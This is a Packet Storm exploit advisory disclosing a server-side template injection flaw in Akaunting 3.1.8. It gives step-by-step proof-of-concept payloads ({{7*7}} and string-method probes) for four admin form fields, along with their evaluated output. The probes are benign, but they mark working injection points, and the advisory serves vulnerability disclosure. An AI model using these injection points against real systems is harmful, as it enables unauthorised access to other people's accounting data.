Akaunting version 3.1.8 suffers from a server-side template injection vulnerability.
a378ee9c1785e1e7d1980af6982f2f8c7d5e2cc4af0975a15adbb1c3dbea4c6e# Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI)
# Exploit Author: tmrswrr
# Date: 30/05/2024
# Vendor: https://akaunting.com/forum
# Software Link: https://akaunting.com/apps/crm
# Vulnerable Version(s): 3.1.8
# Tested : https://www.softaculous.com/apps/erp/Akaunting
1 ) Login with admin cred and go to : Items > New Item
https://127.0.0.1/Akaunting/1/common/items
2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers
3 ) Save it
4 ) You will be see result :
49
====================================================================================
1 ) Login with admin cred and go to :Settings > Taxes > New Tax
https://127.0.0.1/Akaunting/1/settings/taxes/1/edit
2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers
3 ) Save it
4 ) You will be see result :
49
> {{'a'.toUpperCase()}}
> A
> {{'a'.concat('b')}}
> ab
====================================================================================
1 ) Login with admin cred and go to : Banking > Transactions > New Income
https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income
2 ) Write SSTI payload : {{7*7}} Description field
3 ) Save it
4 ) You will be see result :
49
> {{'a'.toUpperCase()}}
> A
> {{'a'.concat('b')}}
> ab
=======================================================================================
1 ) Login with admin cred
https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit
2 ) Write SSTI payload : {{7*7}} Name field
3 ) Save it
4 ) You will be see result :
49
> {{'a'.toUpperCase()}}
> A
> {{'a'.concat('b')}}
> ab
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed